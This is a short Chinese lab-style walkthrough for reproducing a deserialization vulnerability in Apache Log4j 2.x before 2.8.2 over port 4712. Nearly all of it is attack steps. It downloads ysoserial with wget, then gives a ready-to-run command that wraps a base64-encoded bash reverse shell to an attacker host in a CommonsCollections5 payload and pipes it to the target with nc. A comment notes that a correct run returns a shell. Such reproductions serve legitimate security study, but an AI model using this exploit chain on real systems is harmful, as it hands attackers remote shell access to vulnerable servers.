漏洞复现环境搭建请参考
http://t.csdnimg.cn/MxmId
漏洞版本
Apache Log4j 2.8.2之前的2.x版本
漏洞验证
(1)开放端口4712
漏洞利用
(1)ysoserial工具获取
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar
(2)base64加密反弹shell命令
(3)攻击机开启监听
(4)执行命令获取反弹shell
#执行错误原因是因为Kali的jdk版本与ysoserial版本不符,正常执行完该条语句即可反弹shell
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|{bash,-i}" | nc 192.168.88.128 4712